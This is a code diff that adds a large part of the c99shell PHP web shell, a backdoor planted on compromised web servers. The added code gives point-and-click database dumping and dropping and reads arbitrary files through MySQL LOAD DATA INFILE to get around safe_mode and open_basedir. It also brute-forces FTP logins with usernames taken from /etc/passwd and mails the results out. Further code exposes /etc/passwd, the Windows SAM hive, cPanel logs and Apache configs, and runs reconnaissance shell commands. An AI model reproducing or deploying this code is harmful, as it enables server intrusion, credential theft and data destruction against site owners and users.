+     echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
+     if ($dump_file) {$tmp = $dump_file;}
+     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
+     echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
+     echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
+     echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
+     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
+     echo "</form>";
+    }
+    else
+    {
+     $diplay = TRUE;
+     $set = array();
+     $set["sock"] = $sql_sock;
+     $set["db"] = $sql_db;
+     $dump_out = "download";
+     $set["print"] = 0;
+     $set["nl2br"] = 0;
+     $set[""] = 0;
+     $set["file"] = $dump_file;
+     $set["add_drop"] = TRUE;
+     $set["onlytabs"] = array();
+     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
+     $ret = mysql_dump($set);
+     if ($sql_dump_download)
+     {
+      @ob_clean();
+      header("Content-type: application/octet-stream");
+      header("Content-length: ".strlen($ret));
+      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
+      echo $ret;
+      exit;
+     }
+     elseif ($sql_dump_savetofile)
+     {
+      $fp = fopen($sql_dump_file,"w");
+      if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
+      else
+      {
+       fwrite($fp,$ret);
+       fclose($fp);
+       echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
+      }
+     }
+     else {echo "<b>Dump: nothing to do!</b>";}
+    }
+   }
+   if ($diplay)
+   {
+    if (!empty($sql_tbl))
+    {
+     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
+     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
+     $count_row = mysql_fetch_array($count);
+     mysql_free_result($count);
+     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
+     $tbl_struct_fields = array();
+     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
+     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
+     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
+     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
+     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
+     $perpage = $sql_tbl_le - $sql_tbl_ls;
+     if (!is_numeric($perpage)) {$perpage = 10;}
+     $numpages = $count_row[0]/$perpage;
+     $e = explode(" ",$sql_order);
+     if (count($e) == 2)
+     {
+      if ($e[0] == "d") {$asc_desc = "DESC";}
+      else {$asc_desc = "ASC";}
+      $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
+     }
+     else {$v = "";}
+     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
+     $result = mysql_query($query) or print(mysql_smarterror());
+     echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
+     if ($sql_tbl_act == "insert")
+     {
+      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
+      if (!empty($sql_tbl_insert_radio))
+      {
+
+      }
+      else
+      {
+       echo "<br><br><b>Inserting row into table:</b><br>";
+       if (!empty($sql_tbl_insert_q))
+       {
+        $sql_query = "SELECT * FROM `".$sql_tbl."`";
+        $sql_query .= " WHERE".$sql_tbl_insert_q;
+        $sql_query .= " LIMIT 1;";
+        $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
+        $values = mysql_fetch_assoc($result);
+        mysql_free_result($result);
+       }
+       else {$values = array();}
+       echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
+       foreach ($tbl_struct_fields as $field)
+       {
+        $name = $field["Field"];
+        if (empty($sql_tbl_insert_q)) {$v = "";}
+        echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
+        $i++;
+       }
+       echo "</table><br>";
+       echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
+       if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
+       echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
+      }
+     }
+     if ($sql_tbl_act == "browse")
+     {
+      $sql_tbl_ls = abs($sql_tbl_ls);
+      $sql_tbl_le = abs($sql_tbl_le);
+      echo "<hr size=\"1\" noshade>";
+      echo "[Pages]&nbsp;";
+      $b = 0;
+      for($i=0;$i<$numpages;$i++)
+      {
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
+       echo $i;
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
+       if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
+       else {echo "&nbsp;";}
+      }
+      if ($i == 0) {echo "empty";}
+      echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>";
+      echo "<tr>";
+      echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
+      for ($i=0;$i<mysql_num_fields($result);$i++)
+      {
+       $v = mysql_field_name($result,$i);
+       if ($e[0] == "a") {$s = "d"; $m = "asc";}
+       else {$s = "a"; $m = "desc";}
+       echo "<td>";
+       if (empty($e[0])) {$e[0] = "a";}
+       if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
+       else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\">[sort]</a>";}
+       echo "</td>";
+      }
+      echo "<td><font color=\"green\"><b>Action</b></font></td>";
+      echo "</tr>";
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       echo "<tr>";
+       $w = "";
+       $i = 0;
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
+       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
+       $i = 0;
+       foreach ($row as $k=>$v)
+       {
+        $v = htmlspecialchars($v);
+        if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
+        echo "<td>".$v."</td>";
+        $i++;
+       }
+       echo "<td>";
+       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\">[Delete]</a>&nbsp;";
+       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><b>[Edit]</b></a>&nbsp;";
+       echo "</td>";
+       echo "</tr>";
+      }
+      mysql_free_result($result);
+      echo "</table><hr size=\"1\" noshade><p align=\"left\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"deleterow\">Delete</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+     }
+    }
+    else
+    {
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
+     if (!$result) {echo mysql_smarterror();}
+     else
+     {
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
+      $i = 0;
+      $tsize = $trows = 0;
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       $tsize += $row["Data_length"];
+       $trows += $row["Rows"];
+       $size = view_size($row["Data_length"]);
+       echo "<tr>";
+       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
+       echo "<td>".$row["Rows"]."</td>";
+       echo "<td>".$row["Type"]."</td>";
+       echo "<td>".$row["Create_time"]."</td>";
+       echo "<td>".$row["Update_time"]."</td>";
+       echo "<td>".$size."</td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\">[Empty]</a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\">[Drop]</a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><b>[Insert]</b></a>&nbsp;</td>";
+       echo "</tr>";
+       $i++;
+      }
+      echo "<tr bgcolor=\"000000\">";
+      echo "<td><center><b>»</b></center></td>";
+      echo "<td><center><b>".$i." table(s)</b></center></td>";
+      echo "<td><b>".$trows."</b></td>";
+      echo "<td>".$row[1]."</td>";
+      echo "<td>".$row[10]."</td>";
+      echo "<td>".$row[11]."</td>";
+      echo "<td><b>".view_size($tsize)."</b></td>";
+      echo "<td></td>";
+      echo "</tr>";
+      echo "</table><hr size=\"1\" noshade><p align=\"right\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"tbldrop\">Drop</option>";
+      echo "<option value=\"tblempty\">Empty</option>";
+      echo "<option value=\"tbldump\">Dump</option>";
+      echo "<option value=\"tblcheck\">Check table</option>";
+      echo "<option value=\"tbloptimize\">Optimize table</option>";
+      echo "<option value=\"tblrepair\">Repair table</option>";
+      echo "<option value=\"tblanalyze\">Analyze table</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+      mysql_free_result($result);
+     }
+    }
+   }
+   }
+  }
+  else
+  {
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile");
+   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DataBase:</b>
+            <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
+   if (!empty($sql_act))
+   {
+    echo "<hr size=\"1\" noshade>";
+    if ($sql_act == "newdb")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+    }
+    if ($sql_act == "serverstatus")
+    {
+     $result = mysql_query("SHOW STATUS", $sql_sock);
+     echo "<center><b>Server-status variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table></center>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "servervars")
+    {
+     $result = mysql_query("SHOW VARIABLES", $sql_sock);
+     echo "<center><b>Server variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "processes")
+    {
+     if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
+     echo "<center><b>Processes:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "getfile")
+    {
+     $tmpdb = $sql_login."_tmpdb";
+     $select = mysql_select_db($tmpdb);
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
+     if ($select)
+     {
+      $created = FALSE;
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
+      $result = mysql_query("SELECT * FROM tmp_file;");
+      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
+      else
+      {
+       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+       $f = "";
+       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
+       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
+       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
+       mysql_free_result($result);
+       mysql_query("DROP TABLE tmp_file;");
+      }
+     }
+     mysql_drop_db($tmpdb); //comment it if you want to leave database
+    }
+   }
+  }
+ }
+ echo "</td></tr></table>";
+ if ($sql_sock)
+ {
+  $affected = @mysql_affected_rows($sql_sock);
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
+  echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>";
+ }
+ echo "</table>";
+}
+if ($act == "mkdir")
+{
+ if ($mkdir != $d)
+ {
+  if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}
+  elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}
+  echo "<br><br>";
+ }
+ $act = $dspact = "ls";
+}
+if ($act == "ftpquickbrute")
+{
+ echo "<b>FTP Brute Forcer: </b><br>";
+ if (!win) {echo "This functions not work in Windows!<br><br>";}
+ else
+ {
+  function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
+  {
+   if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
+   else {$TRUE = TRUE;}
+   if ($TRUE)
+   {
+    $sock = @ftp_connect($host,$port,$timeout);
+    if (@ftp_login($sock,$login,$pass))
+    {
+     echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
+     ob_flush();
+     return TRUE;
+    }
+   }
+  }
+  if (!empty($submit))
+  {
+   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
+   $fp = fopen("/etc/passwd","r");
+   if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+   else
+   {
+    if ($fqb_logging)
+    {
+     if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
+     else {$fqb_logfp = FALSE;}
+     $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
+     if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    }
+    ob_flush();
+    $i = $success = 0;
+    $ftpquick_st = getmicrotime();
+    while(!feof($fp))
+    {
+     $str = explode(":",fgets($fp,2048));
+     if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
+     {
+      echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
+      $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
+      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+      $success++;
+      ob_flush();
+     }
+     if ($i > $fqb_lenght) {break;}
+     $i++;
+    }
+    if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
+    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+    echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
+    $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
+    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);}
+    fclose($fqb_logfp);
+   }
+  }
+  else
+  {
+   $logfile = $tmpdir_logs."ftpquickbrute_".date("d.m.Y_H_i_s").".log";
+   $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>";
+  }
+ }
+}
+if ($act == "d")
+{
+ if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
+ else
+ {
+  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
+  if (!$win)
+  {
+   echo "<tr><td><b>Owner/Group</b></td><td> ";
+   $ow = posix_getpwuid(fileowner($d));
+   $gr = posix_getgrgid(filegroup($d));
+   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
+  }
+  echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
+ }
+}
+if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();}
+if ($act == "security")
+{
+ echo "<center><b>Server Information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>";
+ if (!$win)
+ {
+  if ($nixpasswd)
+  {
+   if ($nixpasswd == 1) {$nixpasswd = 0;}
+   echo "<b>*nix /etc/passwd:</b><br>";
+   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
+   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
+   $i = $nixpwd_s;
+   while ($i < $nixpwd_e)
+   {
+    $uid = posix_getpwuid($i);
+    if ($uid)
+    {
+     $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
+     echo join(":",$uid)."<br>";
+    }
+    $i++;
+   }
+  }
+  else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
+ }
+ else
+ {
+  $v = $_SERVER["WINDIR"]."\repair\sam";
+  if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
+  else {echo "</br><b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";}
+ }
+ if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";}
+ function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}}
+ displaysecinfo("OS Version?",myshellexec("cat /proc/version"));
+ displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
+ displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));
+ displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));
+ displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));
+ displaysecinfo("RAM",myshellexec("free -m"));
+ displaysecinfo("HDD space",myshellexec("df -h"));
+ displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
+ displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));
+ displaysecinfo("Is cURL installed?",myshellexec("which curl"));
+ displaysecinfo("Is lynx installed?",myshellexec("which lynx"));
+ displaysecinfo("Is links installed?",myshellexec("which links"));
+ displaysecinfo("Is fetch installed?",myshellexec("which fetch"));
+ displaysecinfo("Is GET installed?",myshellexec("which GET"));
+ displaysecinfo("Is perl installed?",myshellexec("which perl"));
